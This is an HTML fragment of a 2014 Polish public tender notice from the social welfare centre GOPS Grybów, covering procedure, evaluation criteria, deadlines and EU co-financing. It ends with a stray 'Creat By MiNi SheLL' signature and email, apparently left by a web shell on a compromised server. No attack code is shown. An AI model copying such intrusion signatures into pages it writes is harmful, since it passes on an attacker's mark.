<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/gopsgrybow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GOPS Grybów
ul. Jakubowskiego 33
33-330 Grybów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2014 godzina 08:00, miejsce: GOPS Grybów
ul. Jakubowskiego 33
33-330 Grybów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Europejskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com